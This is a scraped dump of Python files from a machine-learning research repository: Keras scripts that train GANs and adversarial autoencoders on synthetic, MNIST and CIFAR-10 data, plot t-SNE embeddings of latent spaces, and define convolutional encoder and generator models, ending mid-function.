"/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,516 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_gan_train.py | from __future__ import print_function, division
import numpy as np
from keras.optimizers import Adam
from sd_models import generator_model, gan_discriminator_model
from common_models.common_models import gan_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import plot_gan_epoch_loss, plot_gan_batch_loss, plot_discriminator_acc, save_imgs
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_gan'
model_path = 'Models/sd_gan'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape data to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# Normalize data to (-1,1)
X_train = (X_train - 0.5) / 0.5
X_test = (X_test - 0.5) / 0.5
# =====================================
# Instantiate models
# =====================================
# Instantiate models
discriminator = gan_discriminator_model()
generator = generator_model(gan=True)
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile discriminator
discriminator.compile(loss=['binary_crossentropy'],
optimizer=optimizer,
metrics=['accuracy'])
# Compile GAN
discriminator.trainable = False
gan_generator = gan_model(generator, discriminator)
gan_generator.compile(loss=['binary_crossentropy'],
optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyperparameters
epochs = 100
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
# Create labels for discriminator inputs
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Select next batch of images from training set and encode
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
# Sample noise and generate img
z = np.random.normal(size=(batch_size, latent_dim))
imgs_ = generator.predict(z)
# Train the discriminator (img -> z is valid, z -> img is fake)
d_loss_real = discriminator.train_on_batch(imgs, valid)
d_loss_fake = discriminator.train_on_batch(imgs_, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ----------------------------
# Train Generator
# ----------------------------
# Train the generator (z -> img is valid and img -> z is is invalid)
g_loss = gan_generator.train_on_batch(z, valid)
# Record generator batch loss details
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss
g_epoch_loss_sum += g_loss
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss))
# Record epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=False)
# Save learned generator model to file
save_models(path=model_path, generator=generator)
# =====================================
# Visualization
# =====================================
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,517 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/tsne_test.py | import os
import sys
import h5py
# import cv2
import math
import random, string
from matplotlib.pyplot import cm
import numpy as np
from scipy.stats import norm
from sklearn import manifold
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.ticker import NullFormatter
from mpl_toolkits.mplot3d import Axes3D
from mnist_conv_ae_models import encoder_model
def loadDataset():
from keras.datasets import mnist
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.reshape([-1, 28, 28, 1]) / 255.
X_test = X_test.reshape([-1, 28, 28, 1]) / 255.
return (X_train, y_train), (X_test, y_test)
def plotEmbeddings3D(embeddings, y_sample, labels, num_classes):
print('Plotting in 3D...')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
colors = cm.Spectral(np.linspace(0, 1, num_classes))
xx = embeddings[:, 0]
yy = embeddings[:, 1]
zz = embeddings[:, 2]
# plot the 3D data points
for i in range(num_classes):
ax.scatter(xx[y_sample == i], yy[y_sample == i], zz[y_sample == i], color=colors[i], label=labels[i], s=10)
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
ax.zaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
plt.legend(loc='best', scatterpoints=1, fontsize=5)
plt.show()
def plotEmbeddings2D(embeddings, y_sample, labels, num_classes, with_images=False):
fig = plt.figure()
ax = fig.add_subplot(111)
colors = cm.Spectral(np.linspace(0, 1, num_classes))
xx = embeddings[:, 0]
yy = embeddings[:, 1]
# plot the images
if with_images == True:
for i, (x, y) in enumerate(zip(xx, yy)):
im = OffsetImage(X_sample[i], zoom=0.1, cmap='gray')
ab = AnnotationBbox(im, (x, y), xycoords='data', frameon=False)
ax.add_artist(ab)
ax.update_datalim(np.column_stack([xx, yy]))
ax.autoscale()
# plot the 2D data points
for i in range(num_classes):
ax.scatter(xx[y_sample==i], yy[y_sample==i], color=colors[i], label=labels[i], s=10)
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
plt.legend(loc='best', scatterpoints=1, fontsize=5)
plt.show()
# Show dataset images with T-sne projection of latent space encoding
def computeLatentSpaceEmbeddings(X, encoder, num_dimensions):
# Compute latent space representation
print("Computing latent space projection...")
X_encoded = encoder.predict(X)
# Compute t-SNE embedding of latent space
print("Computing t-SNE embedding...")
tsne = manifold.TSNE(n_components=num_dimensions, init='pca')#, random_state=0)
embeddings = tsne.fit_transform(X_encoded)
return embeddings
# Show dataset images with T-sne projection of pixel space
def computePixelSpaceEmbeddings(X, num_dimensions):
# Compute t-SNE embedding of latent space
print("Computing t-SNE embedding...")
tsne = manifold.TSNE(n_components=num_dimensions, init='pca')#, random_state=0)
embeddings = tsne.fit_transform(X.reshape([-1, imageSize * imageSize * 1]))
return embeddings
## Run visualizations
imageSize = 28
latent_dim = 32
num_dimensions = 3
num_classes = 10
num_samples = 10000
labels = np.arange(num_classes)
# Load dataset to test
print("Loading dataset...")
(X_train, y_train), (X_test, y_test) = loadDataset()
X_sample = X_test[:num_samples]
y_sample = y_test[:num_samples]
print(X_test.shape)
print(X_sample.shape)
encoder = encoder_model()
encoder.load_weights('mnist_conv_ae_encoder.h5')
latent_embeddings = computeLatentSpaceEmbeddings(X_sample, encoder, num_dimensions)
pixel_embeddings = computePixelSpaceEmbeddings(X_sample, num_dimensions)
#plotEmbeddings3D(latent_embeddings, y_sample, labels, num_classes)
#plotEmbeddings3D(pixel_embeddings, y_sample, labels, num_classes)
plotEmbeddings2D(latent_embeddings, y_sample, labels, num_classes)
plotEmbeddings2D(pixel_embeddings, y_sample, labels, num_classes)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,518 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_aae_train.py | from __future__ import print_function, division
from cifar10_models import deterministic_encoder_model, generator_model, aae_discriminator_model
from common_models.common_models import aae_model
from functions.visualization_funcs import save_reconstructions, plot_gan_batch_loss, plot_gan_epoch_loss, \
plot_discriminator_acc, save_imgs
from functions.data_funcs import get_cifar10
from functions.auxiliary_funcs import save_models
from keras.optimizers import Adam
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_aae'
model_path = 'Models/cifar10_aae'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate and compile models
# =====================================
encoder = deterministic_encoder_model()
generator = generator_model()
discriminator = aae_discriminator_model()
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile discriminator
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Compile AAE
discriminator.trainable = False
aae = aae_model(encoder, generator, discriminator, img_shape)
aae.compile(loss=['binary_crossentropy', 'binary_crossentropy'],
loss_weights=[0.99, 0.01],
optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
epoch_save_interval = 5
# Compute number of batches in one epoch
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
latent_fake = encoder.predict(imgs)
latent_real = np.random.normal(size=(batch_size, latent_dim))
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
d_loss_real = discriminator.train_on_batch(latent_real, valid)
d_loss_fake = discriminator.train_on_batch(latent_fake, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ---------------------
# Train Generator
# ---------------------
# Train the generator
g_loss = aae.train_on_batch(imgs, [imgs, valid])
# Record generator loss
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
g_epoch_loss_sum += g_loss[0]
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch + 1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss[0]))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
# Generate random sample of latent vectors and save generated images
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)
# Save visualization of 2D latent space
# Save encoder weights
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,519 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_models.py | import keras.backend as K
from keras.models import Model, Sequential
from keras.layers import Input
from keras.layers.core import Flatten, Dropout, Lambda, Activation, Reshape
from keras.layers.merge import Concatenate
from keras.layers.convolutional import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.engine.topology import Layer
img_rows = 32
img_cols = 32
mask_rows = 10
mask_cols = 10
channels = 3
img_shape = (img_rows, img_cols, channels)
mask_shape = (mask_rows, mask_cols, channels)
latent_dim = 64
class ConvMaxout(Layer):
def __init__(self, n_piece, **kwargs):
self.n_piece = n_piece
super(ConvMaxout, self).__init__(**kwargs)
def call(self, x):
n = K.shape(x)[0]
h = K.shape(x)[1]
w = K.shape(x)[2]
ch = K.shape(x)[3]
x = K.reshape(x, (n, h, w, ch//self.n_piece, self.n_piece))
x = K.max(x, axis=-1)
return x
def compute_output_shape(self, input_shape):
n, h, w, ch = input_shape
return (n, h, w, ch//self.n_piece)
def generator_model():
model = Sequential()
model.add(Reshape((1,1,latent_dim), input_shape=(latent_dim,)))
model.add(Conv2DTranspose(256, (4,4), strides=(1,1)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2DTranspose(128, (4,4), strides=(2,2)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2DTranspose(64, (4,4), strides=(1,1)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2DTranspose(32, (4,4), strides=(2,2)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2DTranspose(32, (5,5), strides=(1,1)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2D(32, (1,1), strides=(1,1)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2D(3, (1,1), strides=(1,1)))
model.add(Activation('sigmoid'))
print(model.output_shape)
return model
def ce_generator_model():
model = Sequential()
model.add(Reshape((1, 1, latent_dim), input_shape=(latent_dim,)))
model.add(Conv2DTranspose(256, (4, 4), strides=(1, 1)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2DTranspose(128, (4, 4), strides=(2, 2)))
model.add(BatchNormalization())
model.add(LeakyReLU(0.1))
model.add(Conv2D(3, (1, 1), strides=(1, 1)))
model.add(Activation('sigmoid'))
return model
def encoder_model():
input = Input(shape=img_shape)
x = Conv2D(32, (5,5), strides=(1,1))(input)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(64, (4,4), strides=(2,2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(128, (4,4), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(256, (4,4), strides=(2,2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (4,4), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (1,1), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
mu = Conv2D(64, (1,1), strides=(1,1))(x)
sigma = Conv2D(64, (1,1), strides=(1,1))(x)
concatenated = Concatenate(axis=-1)([mu, sigma])
z = Lambda(
function=lambda x: x[:,:,:,:64] + K.exp(x[:,:,:,64:]) * K.random_normal(shape=K.shape(x[:,:,:,64:])),
output_shape=(1,1,64))(concatenated)
output = Flatten()(z)
return Model(input, output)
def vae_encoder_model():
input = Input(shape=img_shape)
x = Conv2D(32, (5, 5), strides=(1, 1))(input)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(64, (4, 4), strides=(2, 2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(128, (4, 4), strides=(1, 1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(256, (4, 4), strides=(2, 2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (4, 4), strides=(1, 1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (1, 1), strides=(1, 1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
z_mean = Conv2D(64, (1, 1), strides=(1, 1))(x)
z_log_var = Conv2D(64, (1, 1), strides=(1, 1))(x)
z_mean_out = Flatten()(z_mean)
z_log_var_out = Flatten()(z_log_var)
return Model(input, [z_mean_out, z_log_var_out])
def deterministic_encoder_model():
input = Input(shape=img_shape)
x = Conv2D(32, (5,5), strides=(1,1))(input)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(64, (4,4), strides=(2,2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(128, (4,4), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(256, (4,4), strides=(2,2))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (4,4), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(512, (1,1), strides=(1,1))(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.1)(x)
x = Conv2D(64, (1,1), strides=(1,1))(x)
output = Flatten()(x)
return Model(input, output)
def bigan_discriminator_model():
z_in = Input(shape=(latent_dim,))
x_in = Input(shape=img_shape)
z = Reshape((1, 1, latent_dim))(z_in)
z = Dropout(0.2)(z)
z = Conv2D(512, (1,1), strides=(1,1))(z)
z = ConvMaxout(n_piece=2)(z)
z = Dropout(0.5)(z)
z = Conv2D(512, (1,1), strides=(1,1))(z)
z = ConvMaxout(n_piece=2)(z)
x = Dropout(0.2)(x_in)
x = Conv2D(32, (5,5), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
